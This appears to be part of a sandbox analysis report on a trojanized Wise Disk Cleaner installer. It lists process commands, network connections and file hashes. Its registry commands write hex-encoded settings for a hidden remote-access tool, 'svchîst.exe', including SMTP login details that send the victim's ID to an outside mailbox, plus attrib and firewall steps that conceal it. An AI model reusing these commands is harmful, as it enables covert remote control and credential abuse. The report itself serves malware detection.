3c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
C:\Windows\SysWOW64\drivers\install.exe
"C:\Windows\System32\drivers\install.exe"
C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe
"C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe" "WDCSkipUAC" "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /silentinstall
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
"C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /firewall
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /start
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\SysWOW64\drivers\svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "svchîst.exe"
C:\Windows\SysWOW64\drivers\svchîst.exe
C:\Windows\SysWOW64\drivers\svchîst.exe -firewall
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.wisecleaner.net | udp |
| US | 23.224.25.141:80 | www.wisecleaner.net | tcp |
| US | 8.8.8.8:53 | info.wisecleaner.com | udp |
| US | 8.8.8.8:53 | www.wisecleaner.net | udp |
| US | 104.26.2.143:80 | info.wisecleaner.com | tcp |
| US | 23.224.25.141:80 | www.wisecleaner.net | tcp |
| US | 104.26.2.143:80 | info.wisecleaner.com | tcp |
| US | 8.8.8.8:53 | smtp.spaceweb.ru | udp |
| RU | 77.222.41.129:25 | smtp.spaceweb.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| RU | 77.223.124.212:5655 | tcp |
Files
memory/1096-54-0x0000000075B71000-0x0000000075B73000-memory.dmp
memory/1540-57-0x0000000000000000-mapping.dmp
memory/1660-58-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
memory/620-70-0x0000000000000000-mapping.dmp
memory/644-71-0x0000000000000000-mapping.dmp
memory/1036-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
| MD5 | 2542d7026b9bbf47242cc3bae8e889e7 |
| SHA1 | 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d |
| SHA256 | 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf |
| SHA512 | be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb |
memory/1092-73-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
| MD5 | 2542d7026b9bbf47242cc3bae8e889e7 |
| SHA1 | 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d |
| SHA256 | 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf |
| SHA512 | be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb |
memory/676-68-0x0000000000400000-0x0000000000438000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
memory/676-64-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
memory/280-59-0x0000000000000000-mapping.dmp
memory/1196-56-0x0000000000000000-mapping.dmp
memory/1312-55-0x0000000000000000-mapping.dmp
memory/1524-78-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
memory/1932-82-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
C:\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
memory/1788-91-0x0000000000000000-mapping.dmp
memory/1388-93-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
| MD5 | 2542d7026b9bbf47242cc3bae8e889e7 |
| SHA1 | 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d |
| SHA256 | 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf |
| SHA512 | be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb |
memory/1660-96-0x0000000000000000-mapping.dmp
memory/1616-95-0x0000000000000000-mapping.dmp
memory/1036-94-0x0000000074921000-0x0000000074923000-memory.dmp
memory/1592-92-0x0000000000000000-mapping.dmp
\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
| MD5 | e2921d7229412e500624c09645a5d222 |
| SHA1 | b1ce462f1a21b726f515150c5aede4b8c592c906 |
| SHA256 | ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c |
| SHA512 | 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8 |
\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
| MD5 | e2921d7229412e500624c09645a5d222 |
| SHA1 | b1ce462f1a21b726f515150c5aede4b8c592c906 |
| SHA256 | ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c |
| SHA512 | 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8 |
memory/676-90-0x0000000000400000-0x0000000000438000-memory.dmp
memory/1620-89-0x0000000000000000-mapping.dmp
memory/1464-88-0x0000000000000000-mapping.dmp
memory/1560-87-0x0000000000000000-mapping.dmp
memory/1768-86-0x0000000000000000-mapping.dmp
\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe
| MD5 | e6495a498dfa91672a383cb9459c9c5e |
| SHA1 | d1d44a9ec6df8fc42008c13bcf18ca5f790a371e |
| SHA256 | ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778 |
| SHA512 | 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a |
memory/1128-102-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe
| MD5 | e6495a498dfa91672a383cb9459c9c5e |
| SHA1 | d1d44a9ec6df8fc42008c13bcf18ca5f790a371e |
| SHA256 | ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778 |
| SHA512 | 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a |
\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe
| MD5 | e6495a498dfa91672a383cb9459c9c5e |
| SHA1 | d1d44a9ec6df8fc42008c13bcf18ca5f790a371e |
| SHA256 | ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778 |
| SHA512 | 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a |
memory/1016-105-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll
| MD5 | b936056bd95fa2de3197f0267c07f529 |
| SHA1 | 2cb2a37e5df9a9039995e0248058f0df361d7a90 |
| SHA256 | 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89 |
| SHA512 | 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3 |
memory/1928-117-0x0000000000000000-mapping.dmp
memory/596-120-0x0000000000000000-mapping.dmp
memory/1388-122-0x0000000000000000-mapping.dmp
\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
memory/1924-121-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
memory/1524-116-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll
| MD5 | dfa08af47fb6bbff6b92308bdce07fe8 |
| SHA1 | 63078cb67be4bf2dda6cf0de7cfa204ba91441ca |
| SHA256 | 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce |
| SHA512 | 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll
| MD5 | dfa08af47fb6bbff6b92308bdce07fe8 |
| SHA1 | 63078cb67be4bf2dda6cf0de7cfa204ba91441ca |
| SHA256 | 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce |
| SHA512 | 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967 |
\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll
| MD5 | b936056bd95fa2de3197f0267c07f529 |
| SHA1 | 2cb2a37e5df9a9039995e0248058f0df361d7a90 |
| SHA256 | 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89 |
| SHA512 | 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3 |
memory/824-107-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
| MD5 | e2921d7229412e500624c09645a5d222 |
| SHA1 | b1ce462f1a21b726f515150c5aede4b8c592c906 |
| SHA256 | ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c |
| SHA512 | 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8 |
memory/1844-106-0x0000000000000000-mapping.dmp
memory/280-104-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Greek.ini
| MD5 | 6e449bd01c21478ec0c19bd25a8c3ee5 |
| SHA1 | 2aeba60b7600ca9e71a5fdd04c06ba05f1010262 |
